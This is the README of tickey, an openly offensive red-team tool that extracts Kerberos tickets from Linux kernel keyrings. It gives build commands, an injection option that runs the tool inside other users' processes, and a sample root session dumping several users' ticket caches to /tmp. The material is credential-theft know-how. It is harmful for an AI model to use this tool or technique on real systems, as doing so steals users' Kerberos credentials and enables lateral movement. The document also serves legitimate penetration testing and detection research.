tickey: extract Kerberos tickets from Linux kernel keys
Tickey
A tool to extract Kerberos tickets from Linux kernel keys.
Based on the paper Kerberos Credential Thievery (GNU/Linux).
Install
git clone https://github.com/TarlogicSecurity/tickey
cd tickey/tickey
make CONF=Release
After that, binary should be in dist/Release/GNU-Linux/.
Use
Arguments:
- -i => To perform process injection if it is needed
- -s => To not print in output (for injection)
Important: when injects in another process, tickey performs an execve syscall which invocates its own binary from the context of another user. Therefore, to perform a successful injection, the binary must be in a folder which all users have access, like /tmp.
Execution example:
[root@Lab-LSV01 /]# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so… DUMP ALL THE TICKETS!!
[*] Trying to inject in tarlogic[1000] session…
[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache
[*] Trying to inject in velociraptor[1120601115] session…
[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
[*] Trying to inject in trex[1120601113] session…
[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
[X] [uid:0] Error retrieving tickets
Copyright (C) 2019 Eloy Pérez González @Zer1t0 at @Tarlogic – https://www.tarlogic.com/en/
